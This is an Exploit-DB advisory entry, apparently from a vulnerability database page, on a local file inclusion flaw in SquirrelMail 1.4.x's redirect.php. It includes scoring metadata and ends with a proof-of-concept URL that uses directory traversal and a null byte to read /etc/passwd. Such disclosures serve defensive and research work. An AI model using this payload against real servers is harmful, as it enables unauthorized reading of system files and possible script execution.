Lucene search

K
exploitdbBrokejunkerEDB-ID:27948
HistoryJun 02, 2006 - 12:00 a.m.

Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion

2006-06-0200:00:00
brokejunker
www.exploit-db.com
216

AI Score

7.4

Confidence

Low

EPSS

0.337

Percentile

97.1%

source: https://www.securityfocus.com/bid/18231/info

SquirrelMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit may allow unauthorized users to view files and to execute local scripts; other attacks are also possible.

http://www.example.com/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00

AI Score

7.4

Confidence

Low

EPSS

0.337

Percentile

97.1%